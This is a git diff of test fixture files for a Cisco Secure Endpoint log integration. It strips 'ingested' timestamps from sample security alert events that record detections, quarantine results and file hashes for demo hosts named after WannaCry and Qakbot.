"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -3766,7 +3721,6 @@ ], "code": "2164260880", "id": "6419204905956803000", - "ingested": "2022-02-02T05:53:17.131282750Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -3842,7 +3796,6 @@ ], "code": "2164260880", "id": "6419204905956803000", - "ingested": "2022-02-02T05:53:17.131283534Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -3918,7 +3871,6 @@ ], "code": "2164260880", "id": "6419204905956803000", - "ingested": "2022-02-02T05:53:17.131284311Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -3996,7 +3948,6 @@ ], "code": "1090519054", "id": "6419204905956803000", - "ingested": "2022-02-02T05:53:17.131285082Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 @@ -4093,7 +4044,6 @@ ], "code": "1090519054", "id": "6419204905956803000", - "ingested": "2022-02-02T05:53:17.131285847Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -4177,7 +4127,6 @@ ], "code": "553648143", "id": "6419204905956803000", - "ingested": "2022-02-02T05:53:17.131286709Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 2 @@ -4253,7 +4202,6 @@ ], "code": "2164260880", "id": "6419204901661835000", - "ingested": "2022-02-02T05:53:17.131287469Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -4329,7 +4277,6 @@ ], "code": "2164260880", "id": "6419204901661835000", - "ingested": "2022-02-02T05:53:17.131288251Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json index 474df773a06..51dc257ae45 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json @@ -46,7 +46,6 @@ ], "code": "2164260880", "id": "6419204901661835000", - "ingested": "2022-02-02T05:53:29.530496194Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -120,7 +119,6 @@ ], "code": "1090519054", "id": "6419204901661835000", - "ingested": "2022-02-02T05:53:29.530499932Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -206,7 +204,6 @@ ], "code": "1090519054", "id": "6419204901661835000", - "ingested": "2022-02-02T05:53:29.530501210Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -292,7 +289,6 @@ ], "code": "1090519054", "id": "6419204901661835000", - "ingested": "2022-02-02T05:53:29.530502346Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -382,7 +378,6 @@ ], "code": "1090519054", "id": "6419204901661835000", - "ingested": "2022-02-02T05:53:29.530503370Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -470,7 +465,6 @@ ], "code": "553648143", "id": "6419204901661835000", - "ingested": "2022-02-02T05:53:29.530504375Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -546,7 +540,6 @@ ], "code": "2164260880", "id": "6411462922463085000", - "ingested": "2022-02-02T05:53:29.530505377Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 2 @@ -618,7 +611,6 @@ ], "code": "553648143", "id": "6411462922463085000", - "ingested": "2022-02-02T05:53:29.530506442Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 2 @@ -692,7 +684,6 @@ ], "code": "1090519054", "id": "6411462918168117000", - "ingested": "2022-02-02T05:53:29.530507635Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat 